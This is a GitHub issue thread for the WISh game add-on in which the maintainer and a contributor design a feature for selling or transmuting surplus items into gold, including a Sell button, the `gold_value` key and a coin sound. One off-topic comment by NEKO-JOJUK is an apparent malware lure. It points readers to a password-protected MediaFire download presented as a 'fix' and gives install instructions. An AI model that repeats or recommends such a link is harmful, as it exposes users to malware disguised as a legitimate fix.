### ISSUE TITLE
Feature: add "Transmute" option to Item Stats to "alchemized item to gold" and give side `gold_value` gold.

### ISSUE THREAD

**Issue by knyghtmare** [babaissarkar/WISh#20]
- Kind of related to #16 but builds up on it to the implementation of the thing.
- For campaigns using less than 10 artifacts it's not needed, but for ones where there might be like 30-40, we should have this so that players can get rid of the unneeded ones.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by babaissarkar** [comment]
So from the title, you just need a button on the item stats dialog, clicking which removes the item and adds equivalent amount of gold to that side, right?

**Comment by knyghtmare** [comment]
> So from the title, you just need a button on the item stats dialog, clicking which removes the item and adds equivalent amount of gold to that side, right?

Yeah, like this. And maybe a gold coins sound and a chat log message like "`item_name` has been transmuted to `gold_value` gold pieces" and update player.

I feel like this can be the one of the first pieces of an RPG campaign I got in the shelf.

**Comment by babaissarkar** [comment]
Specifying `gold_value` key inside the `[object]` activate the Sell button in inventory and shows the price in Item Stats dialog.
![Screenshot from 2024-09-12 08-30-31](https://github.com/user-attachments/assets/6f48dff4-e6bd-4cc8-a401-381c298e1e2a)
![Screenshot from 2024-09-12 08-30-16](https://github.com/user-attachments/assets/7fd4372c-7990-4c2d-b6bd-0b7d98d3f8cf)
![Screenshot from 2024-09-12 08-30-43](https://github.com/user-attachments/assets/fb80691d-34f0-40b6-ad9f-2f829f3b7dcd)

@knyghtmare  Can you supply an audio file for the selling sound effect? Just commit it to main and reference this issue in the commit heading.

**Comment by knyghtmare** [comment]
> Can you supply an audio file for the selling sound effect? Just commit it to main and reference this issue in the commit heading.

Using the core sound `gold.ogg` as it seems to be the intended sound effect.
